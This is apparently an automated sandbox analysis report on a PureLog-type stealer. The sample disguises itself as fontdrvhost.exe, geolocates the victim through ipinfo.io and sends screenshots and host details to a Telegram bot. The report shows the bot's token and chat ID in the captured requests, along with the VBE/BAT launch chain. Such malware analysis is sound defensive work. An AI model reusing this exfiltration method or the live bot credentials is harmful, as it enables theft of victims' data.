cfL4;desc="?proto=TCP&rtt=3865&min_rtt=1474&rtt_var=5335&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=70856&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	34.117.59.81	443	5012	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 13:52:00 UTC	61	OUT	GET /ip HTTP/1.1 Host: ipinfo.io Connection: Keep-Alive
2025-01-01 13:52:00 UTC	305	IN	HTTP/1.1 200 OK date: Wed, 01 Jan 2025 13:51:59 GMT content-type: text/plain; charset=utf-8 Content-Length: 12 access-control-allow-origin: * via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-01-01 13:52:00 UTC	12	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 Data Ascii: 8.46.123.189

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	34.117.59.81	443	5012	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 13:52:00 UTC	42	OUT	GET /country HTTP/1.1 Host: ipinfo.io
2025-01-01 13:52:00 UTC	448	IN	HTTP/1.1 200 OK access-control-allow-origin: * Content-Length: 3 content-type: text/html; charset=utf-8 date: Wed, 01 Jan 2025 13:52:00 GMT referrer-policy: strict-origin-when-cross-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-01-01 13:52:00 UTC	3	IN	Data Raw: 55 53 0a Data Ascii: US

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	149.154.167.220	443	5012	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 13:52:02 UTC	255	OUT	POST /bot8143016568:AAEvmfltzzwYHiQ7qyRFPs1EAB_RQhZk4kg/sendPhoto HTTP/1.1 Content-Type: multipart/form-data; boundary="df078fe5-ba23-4170-8bea-85b5048774e2" Host: api.telegram.org Content-Length: 86411 Expect: 100-continue Connection: Keep-Alive
2025-01-01 13:52:02 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-01 13:52:02 UTC	40	OUT	Data Raw: 2d 2d 64 66 30 37 38 66 65 35 2d 62 61 32 33 2d 34 31 37 30 2d 38 62 65 61 2d 38 35 62 35 30 34 38 37 37 34 65 32 0d 0a Data Ascii: --df078fe5-ba23-4170-8bea-85b5048774e2
2025-01-01 13:52:02 UTC	89	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2025-01-01 13:52:02 UTC	10	OUT	Data Raw: 36 32 38 33 33 37 33 34 34 32 Data Ascii: 6283373442
2025-01-01 13:52:02 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 64 66 30 37 38 66 65 35 2d 62 61 32 33 2d 34 31 37 30 2d 38 62 65 61 2d 38 35 62 35 30 34 38 37 37 34 65 32 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 61 70 74 69 6f 6e 0d 0a 0d 0a Data Ascii: --df078fe5-ba23-4170-8bea-85b5048774e2Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=caption
2025-01-01 13:52:02 UTC	140	OUT	Data Raw: 6e 65 77 20 75 73 65 72 20 63 6f 6e 6e 65 63 74 20 21 0a 49 44 3a 20 36 32 66 62 63 64 63 31 30 66 37 39 37 66 30 36 61 62 32 31 35 33 30 31 33 33 31 33 62 36 66 65 35 36 66 38 34 38 65 35 0a 43 6f 6d 6d 65 6e 74 3a 20 4e 45 57 4f 52 4b 20 50 43 0a 55 73 65 72 6e 61 6d 65 3a 20 6a 6f 6e 65 73 0a 50 43 20 4e 61 6d 65 3a 20 35 37 31 33 34 35 0a 49 50 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0a 47 45 4f 3a 20 55 53 0a Data Ascii: new user connect !ID: 62fbcdc10f797f06ab2153013313b6fe56f848e5Comment: NEWORK PCUsername: userPC Name: 571345IP: 8.46.123.189GEO: US
2025-01-01 13:52:02 UTC	146	OUT	Data Raw: 0d 0a 2d 2d 64 66 30 37 38 66 65 35 2d 62 61 32 33 2d 34 31 37 30 2d 38 62 65 61 2d 38 35 62 35 30 34 38 37 37 34 65 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 70 68 6f 74 6f 3b 20 66 69 6c 65 6e 61 6d 65 3d 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 0d 0a 0d 0a Data Ascii: --df078fe5-ba23-4170-8bea-85b5048774e2Content-Disposition: form-data; name=photo; filename=screenshot.png; filename*=utf-8''screenshot.png
2025-01-01 13:52:02 UTC	4096	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1AQa"q2
2025-01-01 13:52:02 UTC	4096	OUT	Data Raw: 76 a2 80 b8 9d 28 c6 38 a5 26 93 bf 7a 63 03 8a 43 4b 49 48 62 1c fa d2 53 b9 14 84 7f 9c d0 31 b4 a6 8f e9 49 da 81 87 e3 47 7a 3f ce 28 38 a0 04 a4 c7 38 eb 4e ed 49 da 98 c4 3d 31 41 1c d1 d8 75 a2 81 89 8c f4 a0 0a 08 14 60 e3 d6 80 10 d1 fa 51 8f 6a 0f 5a 43 01 d6 93 34 bf d6 92 80 10 d1 9a 28 3d e8 18 87 a5 1f 85 2f 7e 69 33 f5 a6 01 45 19 c5 19 fa 50 02 67 3e 94 a7 9f 6c 7b d2 1e b4 66 90 c0 75 cf e9 47 1f 9d 19 e2 8c 50 30 fc 29 b4 ee df e3 49 f8 53 00 a4 1e f4 a4 52 0e 3d a9 00 51 fe 73 40 eb 45 03 03 49 4b d8 d0 39 a0 06 9a 5c f3 d3 04 d1 df ad 26 71 9f e9 4c 00 f4 a3 8c d1 47 5c d2 18 63 ad 07 39 c7 eb 46 28 fc 29 80 83 93 8e b4 a6 8f f3 c5 20 3f e7 34 00 1e 7f fd 54 66 94 f5 e3 f3 a4 3f 95 21 87 4a 3a d1 49 fc a9 8c ef 28 a6 4d 2a c3 0b 48 df Data Ascii: v(8&zcCKIHbS1IGz?(88NI=1Au`QjZC4(=/~i3EPg>l{fuGP0)ISR=Qs@EIK9\&qLG\c9F() ?4Tf?!J:I(M*H
2025-01-01 13:52:02 UTC	4096	OUT	Data Raw: 22 83 eb 41 39 e2 8e de 94 00 84 7e 20 51 41 e3 de 8a 06 18 c5 14 7e 34 64 d0 02 7e 66 93 bf 6a 53 9c f6 a3 9a 06 84 a4 eb 4b 8e 79 a4 a0 04 3d a8 3d 69 71 fa 52 1e 08 a6 30 34 84 73 4b 46 3f 4f 4a 40 27 5a 05 1c d1 9f c2 98 c4 14 0a 5f 7a 4a 00 3d fa d1 c5 1d 3f 95 19 a0 62 77 1e f4 7f 9e 69 71 41 a0 04 3f ad 06 83 41 f5 a0 04 a0 f4 a5 fc 29 28 18 75 18 1e bd 28 a3 af 5f ce 93 3c 50 01 47 5f ad 28 a4 e9 40 05 25 2e 7f 01 49 40 c0 9e b4 74 e2 83 cd 04 d1 60 03 ef fa d2 52 9f c2 82 31 45 80 4e be 94 76 a0 f5 e3 f1 a2 90 ce ee 8a 5a 29 1f 2c 25 14 b4 50 02 51 41 a2 80 0a 28 a2 81 85 25 2d 14 00 94 51 45 03 0a 28 a5 14 08 4c e2 8a 5a 0d 00 14 52 51 4c 05 a5 dc 69 b9 a2 80 1d 90 7a 8a 4d aa 7a 1c 50 28 a0 04 d8 7b 73 4d c5 3f 26 97 77 ad 1a 0e e4 78 a2 a4 f9 Data Ascii: "A9~ QA~4d~fjSKy==iqR04sKF?OJ@'Z_zJ=?bwiqA?A)(u(_<PG_(@%.I@t`R1ENvZ),%PQA(%-QE(LZRQLizMzP({sM?&wx
2025-01-01 13:52:02 UTC	4096	OUT	Data Raw: de ba 7d bb 67 79 ff 00 6d bb ff 00 9e 95 cd 39 b9 41 46 a3 8f 2a b6 ce ed db 6d 3f e1 8e f8 41 46 6e 54 d4 b9 9d f7 56 4a fb eb ff 00 0e 61 dd db c9 6b f0 a7 48 8e 51 86 33 07 c7 b3 79 8c 3f 42 2b 8e af 50 f8 86 02 f8 6e 10 00 00 5d 20 00 7f ba d5 e5 f5 ea e5 53 f6 94 e7 37 d6 4d fe 47 83 9d c3 d9 d6 84 17 48 a5 f8 b0 a2 8a 2b d3 3c 60 a2 8a 29 80 a0 9a 5d fd 88 cd 33 14 53 0b 0e f9 4f b5 27 97 e8 73 49 46 68 01 0a 11 d4 53 6a 50 e4 51 95 3d 56 95 87 72 2a 2a 4d 88 7a 1c 52 18 cf 6e 68 b3 1d c8 cd 14 e2 08 ed 49 48 62 52 52 d1 40 09 45 2d 27 7a 63 10 d1 4b 49 40 09 45 2d 06 81 89 49 4b 45 03 12 8a 28 a0 02 92 96 83 40 0d a2 96 8a 06 36 8a 5c 66 92 98 c4 a2 97 14 50 17 12 8a 5a 29 00 94 7e 14 51 40 09 48 69 68 a0 62 51 41 a2 81 85 25 2d 25 00 14 94 b4 53 Data Ascii: }gym9AFm?AFnTVJakHQ3y?B+Pn] S7MGH+<`)]3SO'sIFhSjPQ=Vr*MzRnhIHbRR@E-'zcKI@E-IKE(@6\fPZ)~Q@HihbQA%-%S
2025-01-01 13:52:03 UTC	1584	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 01 Jan 2025 13:52:03 GMT Content-Type: application/json Content-Length: 1195 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":781,"from":{"id":8143016568,"is_bot":true,"first_name":"\u0411\u041e\u0422\u0418\u041a","username":"Heusjsjs628_bot"},"chat":{"id":6283373442,"first_name":"Loftan","username":"Lofty_Code","type":"private"},"date":1735739523,"photo":[{"file_id":"AgACAgEAAxkDAAIDDWd1SIPknbLjawrSogMlhEn9JTmAAAJqrDEbCc2pRx6crcGEUbrmAQADAgADcwADNgQ","file_unique_id":"AQADaqwxGwnNqUd4","file_size":1089,"width":90,"height":72},{"file_id":"AgACAgEAAxkDAAIDDWd1SIPknbLjawrSogMlhEn9JTmAAAJqrDEbCc2pRx6crcGEUbrmAQADAgADbQADNgQ","file_unique_id":"AQADaqwxGwnNqUdy","file_size":13912,"width":320,"height":256},{"file_id":"AgACAgEAAxkDAAIDDWd1SIPknbLjawrSogMlhEn9JTmAAAJqrDEbCc2pRx6crcGEUbrmAQADAgADeAADNgQ","file_unique_id":"AQADaqwxGwnNqUd9","file_size":58173,"width":800,"height":640},{"file_id":"AgACAgEAAxkDAAIDDWd1SIPknbLjawrSogMlhEn9JTmAAAJqrDEbCc2pRx6crcGEUbrmAQADAgADeQADNgQ","file_unique_id":"AQADaqwxGwnNqUd-","file_size":85811,"width":1280,"height":1024}],"caption":"new user connect !\nID: 62fbcdc10f797f [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49744	34.117.59.81	443	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 13:52:12 UTC	61	OUT	GET /ip HTTP/1.1 Host: ipinfo.io Connection: Keep-Alive
2025-01-01 13:52:12 UTC	305	IN	HTTP/1.1 200 OK date: Wed, 01 Jan 2025 13:52:12 GMT content-type: text/plain; charset=utf-8 Content-Length: 12 access-control-allow-origin: * via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-01-01 13:52:12 UTC	12	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 Data Ascii: 8.46.123.189

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49749	34.117.59.81	443	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 13:52:13 UTC	42	OUT	GET /country HTTP/1.1 Host: ipinfo.io
2025-01-01 13:52:13 UTC	448	IN	HTTP/1.1 200 OK access-control-allow-origin: * Content-Length: 3 content-type: text/html; charset=utf-8 date: Wed, 01 Jan 2025 13:52:13 GMT referrer-policy: strict-origin-when-cross-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-01-01 13:52:13 UTC	3	IN	Data Raw: 55 53 0a Data Ascii: US

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49753	149.154.167.220	443	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 13:52:13 UTC	255	OUT	POST /bot8143016568:AAEvmfltzzwYHiQ7qyRFPs1EAB_RQhZk4kg/sendPhoto HTTP/1.1 Content-Type: multipart/form-data; boundary="a8ac2ac3-d8f0-4277-97c7-16037a3c7cfa" Host: api.telegram.org Content-Length: 92361 Expect: 100-continue Connection: Keep-Alive
2025-01-01 13:52:14 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-01 13:52:14 UTC	40	OUT	Data Raw: 2d 2d 61 38 61 63 32 61 63 33 2d 64 38 66 30 2d 34 32 37 37 2d 39 37 63 37 2d 31 36 30 33 37 61 33 63 37 63 66 61 0d 0a Data Ascii: --a8ac2ac3-d8f0-4277-97c7-16037a3c7cfa
2025-01-01 13:52:14 UTC	89	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2025-01-01 13:52:14 UTC	10	OUT	Data Raw: 36 32 38 33 33 37 33 34 34 32 Data Ascii: 6283373442
2025-01-01 13:52:14 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 61 38 61 63 32 61 63 33 2d 64 38 66 30 2d 34 32 37 37 2d 39 37 63 37 2d 31 36 30 33 37 61 33 63 37 63 66 61 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 61 70 74 69 6f 6e 0d 0a 0d 0a Data Ascii: --a8ac2ac3-d8f0-4277-97c7-16037a3c7cfaContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=caption
2025-01-01 13:52:14 UTC	93	OUT	Data Raw: 4c 6f 67 20 63 6f 6c 6c 65 63 74 65 64 0a 49 44 3a 20 36 32 66 62 63 64 63 31 30 66 37 39 37 66 30 36 61 62 32 31 35 33 30 31 33 33 31 33 62 36 66 65 35 36 66 38 34 38 65 35 0a 43 6f 6d 6d 65 6e 74 3a 20 4e 45 57 4f 52 4b 20 50 43 0a 4c 6f 67 20 73 69 7a 65 3a 20 38 36 33 30 34 Data Ascii: Log collectedID: 62fbcdc10f797f06ab2153013313b6fe56f848e5Comment: NEWORK PCLog size: 86304
2025-01-01 13:52:14 UTC	146	OUT	Data Raw: 0d 0a 2d 2d 61 38 61 63 32 61 63 33 2d 64 38 66 30 2d 34 32 37 37 2d 39 37 63 37 2d 31 36 30 33 37 61 33 63 37 63 66 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 70 68 6f 74 6f 3b 20 66 69 6c 65 6e 61 6d 65 3d 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 0d 0a 0d 0a Data Ascii: --a8ac2ac3-d8f0-4277-97c7-16037a3c7cfaContent-Disposition: form-data; name=photo; filename=screenshot.png; filename*=utf-8''screenshot.png
2025-01-01 13:52:14 UTC	4096	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1AQa"q2
2025-01-01 13:52:14 UTC	4096	OUT	Data Raw: d3 dd 34 8f 9f e2 1c 56 1a b6 12 d0 9c 64 ee b6 69 b3 0a 8a 5a 2b f4 03 e1 84 a2 96 92 80 0a f4 5f 85 bf f2 2f 5f ff 00 d8 42 4f fd 01 2b ce ab d1 7e 17 7f c8 bd 7f ff 00 61 09 3f f4 04 af 9f cf 7f e5 d7 ab fc 8f af e1 7f e1 62 7d 23 f9 9a d7 3e 0f b3 bd d7 1f 51 bb 9e 59 a3 79 16 53 6c c0 6c 2c aa 02 e4 f5 20 63 21 4f 19 27 d4 d7 45 5c 57 8d f4 2b dd 7b 57 d2 a0 b4 b7 89 87 d9 6e d4 dc 4c 1b 6d b3 37 95 b5 c1 50 7e 71 82 54 64 67 07 9a e4 35 1d 0f 52 7b 4d 62 3b 1d 32 fc 5d 19 f5 03 77 37 90 cb f6 a8 98 b7 94 07 1f bc 24 ed 61 8c e0 03 eb 5e 04 61 18 de cb 73 e8 ea d7 a9 55 45 4d dd 25 64 7b 25 79 47 c4 6f f9 1c ed ff 00 ec 1e bf fa 31 eb d1 74 2d 37 fb 27 49 8a cc c5 67 1b 29 62 56 ce 13 14 5c 92 78 52 49 1f 9d 79 d7 c4 6f f9 1c ed ff 00 ec 1e bf fa 31 Data Ascii: 4VdiZ+_/_BO+~a?b}#>QYySll, c!O'E\W+{WnLm7P~qTdg5R{Mb;2]w7$a^asUEM%d{%yGo1t-7'Ig)bV\xRIyo1
2025-01-01 13:52:14 UTC	4096	OUT	Data Raw: bb f3 c6 31 f3 00 41 ea 09 eb cd 51 f1 05 de 96 34 c7 b3 d3 7c e5 0d a4 34 22 06 89 bf 75 2b de ac c6 20 71 82 02 ee c3 74 20 0e fc 57 44 55 49 c9 50 4f ae 29 0c 51 37 26 34 27 dd 45 70 57 ca e3 56 a3 a9 cd 66 dd ff 00 0b 1e ae 17 3b a9 87 84 61 cb 74 bf ce e5 3d 47 5a d3 f5 5f 17 c1 ae 4d 21 87 ec 3a 9c 46 37 30 c9 b2 e2 d4 4b b8 32 a8 5c a3 ae 58 91 81 b8 1c fd ec ee aa ba cd e0 d2 b5 3f b4 43 a7 83 3d b9 16 e2 0d 3a 28 99 dc 4f 1b 80 59 23 07 05 55 89 cf 1c 73 ce 2b 5b ca 8c 8c 79 69 8f 4d b4 be 5a 60 0d 8b c7 4e 2b 38 e5 10 8c 79 79 ba 7e 65 4b 3d 9b 92 6a 2b 7b fd db 22 ad b1 d3 86 a9 75 aa da 6a 36 c2 e6 57 9a ee de d2 e3 30 ca 64 70 4f 96 f2 38 11 28 04 9f 9b 7f 20 70 32 70 29 24 da 41 87 ec 2d 15 fb 40 ba 59 d3 da fb cf cc 3b cf ef 0c 9e 48 8b 71 Data Ascii: 1AQ4\|4"u+ qt WDUIPO)Q7&4'EpWVf;at=GZ_M!:F70K2\X?C=:(OY#Us+[yiMZ`N+8yy~eK=j+{"uj6W0dpO8( p2p)$A-@Y;Hq
2025-01-01 13:52:14 UTC	4096	OUT	Data Raw: 7a 52 77 a3 ad 00 14 9f 9d 29 f5 a4 20 63 de 90 c4 c7 d3 14 52 e2 90 fb d3 40 21 a2 94 f4 a3 b7 f4 a0 63 4f 5f 4a 31 de 97 20 0a 43 d2 80 0a 4c 63 fa 52 fe 94 62 81 89 46 78 a2 83 40 20 e9 47 7f 5a 3a d2 66 81 85 1f d2 8e fd 28 34 00 94 7a f1 4a 69 28 18 77 a2 83 fe 45 18 fe 5d 68 01 09 cd 14 bc d2 03 40 c0 d2 1f 4a 5f 4a 28 01 08 a2 96 93 a5 00 1f 4a 3a d1 de 8a 00 28 fa 51 d6 92 81 9d ed 53 d4 ff 00 e4 19 71 fe e1 fe 55 73 bd 53 d5 3f e4 1b 71 fe e1 fe 55 cf 89 fe 0c fd 1f e4 78 18 0f f7 aa 5f e2 5f 99 c4 d1 45 15 f9 51 fd 22 7a 74 5e 0d d1 1b c2 0c e2 d6 77 bc 6d 11 b5 51 7f e6 9c 2b af 58 b6 74 c7 bf 27 ad 79 8d 7b 6e 83 65 aa 49 f0 42 6b 78 d5 5e f2 e2 29 45 a4 67 87 30 96 cb 28 ee 49 01 c8 1f 4a f1 2a de b4 52 51 69 74 3c cc be a4 a7 2a aa 52 bd a5 Data Ascii: zRw) cR@!cO_J1 CLcRbFx@ GZ:f(4zJi(wE]h@J_J(J:(QSqUsS?qUx__EQ"zt^wmQ+Xt'y{neIBkx^)Eg0(IJRQit<R
2025-01-01 13:52:15 UTC	1474	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 01 Jan 2025 13:52:15 GMT Content-Type: application/json Content-Length: 1085 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":782,"from":{"id":8143016568,"is_bot":true,"first_name":"\u0411\u041e\u0422\u0418\u041a","username":"Heusjsjs628_bot"},"chat":{"id":6283373442,"first_name":"Loftan","username":"Lofty_Code","type":"private"},"date":1735739535,"photo":[{"file_id":"AgACAgEAAxkDAAIDDmd1SI-gn93kywqupbRy0btIYXh9AAJrrDEbCc2pR7mB-S0yNswzAQADAgADcwADNgQ","file_unique_id":"AQADa6wxGwnNqUd4","file_size":1175,"width":90,"height":72},{"file_id":"AgACAgEAAxkDAAIDDmd1SI-gn93kywqupbRy0btIYXh9AAJrrDEbCc2pR7mB-S0yNswzAQADAgADbQADNgQ","file_unique_id":"AQADa6wxGwnNqUdy","file_size":14843,"width":320,"height":256},{"file_id":"AgACAgEAAxkDAAIDDmd1SI-gn93kywqupbRy0btIYXh9AAJrrDEbCc2pR7mB-S0yNswzAQADAgADeAADNgQ","file_unique_id":"AQADa6wxGwnNqUd9","file_size":62032,"width":800,"height":640},{"file_id":"AgACAgEAAxkDAAIDDmd1SI-gn93kywqupbRy0btIYXh9AAJrrDEbCc2pR7mB-S0yNswzAQADAgADeQADNgQ","file_unique_id":"AQADa6wxGwnNqUd-","file_size":91808,"width":1280,"height":1024}],"caption":"Log collected\nID: 62fbcdc10f797f06ab2 [TRUNCATED]

Target ID:	0
Start time:	08:51:52
Start date:	01/01/2025
Path:	C:\Users\user\Desktop\YGk3y6Tdix.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\YGk3y6Tdix.exe"
Imagebase:	0xfa0000
File size:	2'312'934 bytes
MD5 hash:	E38B0FC914530E6682D067159B0C7C34
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1645430393.00000000051B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1644690236.0000000006812000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	08:51:52
Start date:	01/01/2025
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Drivers\6RHoR6LVzzezwu6iEjrLxYdAHRXCcmMIlUFOAkT.vbe"
Imagebase:	0x7a0000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:51:54
Start date:	01/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Drivers\QSdmXzK8rClLDrHgb.bat" "
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:51:54
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:51:54
Start date:	01/01/2025
Path:	C:\Drivers\fontdrvhost.exe
Wow64 process (32bit):	false
Commandline:	"C:\/Drivers/fontdrvhost.exe"
Imagebase:	0xb80000
File size:	1'991'168 bytes
MD5 hash:	BA58757137700B6B304B45298D986EB1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
